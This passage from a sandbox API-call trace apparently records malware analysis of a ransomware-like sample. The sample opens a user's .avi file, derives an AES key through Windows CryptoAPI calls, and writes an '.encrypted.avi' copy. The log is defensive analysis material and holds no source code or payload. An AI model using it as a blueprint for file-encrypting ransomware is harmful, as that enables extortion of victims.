lpString1="mcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="33uYXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3uYXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uYXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Xhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6vtf\\tjNI\\lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vtf\\tjNI\\lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tf\\tjNI\\lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f\\tjNI\\lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\tjNI\\lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tjNI\\lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jNI\\lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NI\\lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="I\\lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0031.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0031.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0031.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0031.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0031.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0031.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0031.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0031.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0031.283] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.283] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0031.283] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0031.283] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0031.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0031.283] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0031.283] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0031.283] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0031.283] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0031.283] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5336bc70, ftCreationTime.dwHighDateTime=0x1d5c5bb, ftLastAccessTime.dwLowDateTime=0x7f98f740, ftLastAccessTime.dwHighDateTime=0x1d5c185, ftLastWriteTime.dwLowDateTime=0x7f98f740, ftLastWriteTime.dwHighDateTime=0x1d5c185, nFileSizeHigh=0x0, nFileSizeLow=0x123c4, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="5EM8.avi", cAlternateFileName="")) returned 0x7c2100 [0031.284] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0031.284] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0031.284] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.284] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0031.284] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0031.284] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.284] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.292] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5bb8) returned 1 [0031.293] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0031.294] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0031.294] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0031.294] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0031.294] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.294] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0031.294] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.294] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0031.294] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.294] CryptCreateHash (in: hProv=0x7d5bb8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0031.294] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0031.295] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.295] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.295] CryptHashData (hHash=0x7c2240, pbData=0x7c75d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0031.295] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.295] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0031.295] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.295] CryptDeriveKey (in: hProv=0x7d5bb8, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c21c0) returned 1 [0031.295] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.295] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.295] CryptDestroyHash (hHash=0x7c2240) returned 1 [0031.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0031.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0031.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0031.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0031.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0031.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0031.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0031.295] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\lk15vz5k\\5em8.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0031.295] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0031.296] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0031.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0031.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0031.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0031.296] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0031.296] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0031.296] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0031.296] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0031.296] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0031.296] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0031.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0031.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0031.296] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0031.296] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.296] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0031.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0031.296] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.296] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0031.296] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0031.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0031.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0031.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0031.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0031.296] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0031.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0031.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0031.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0031.296] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0031.296] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0031.296] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0031.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0031.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0031.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0031.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0031.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0031.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0031.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0031.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0031.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0031.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0031.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0031.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0031.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0031.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0031.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc0) returned 0x7c75d0 [0031.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0031.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c3818 [0031.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0031.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c38b0 [0031.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c75d0 | out: hHeap=0x770000) returned 1 [0031.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0031.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0031.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0031.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c3818 | out: hHeap=0x770000) returned 1 [0031.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0031.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0031.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c3818 [0031.297] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\lk15vz5k")) returned 0x10 [0031.298] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c3818 | out: hHeap=0x770000) returned 1 [0031.298] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.298] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c38b0 | out: hHeap=0x770000) returned 1 [0031.299] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0031.299] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0031.299] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.299] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0031.299] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x89ffb8 [0031.299] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0031.299] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0031.299] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.encrypted.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\lk15vz5k\\5em8.encrypted.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0031.299] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0031.299] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0031.299] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0031.299] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0031.299] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0031.300] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 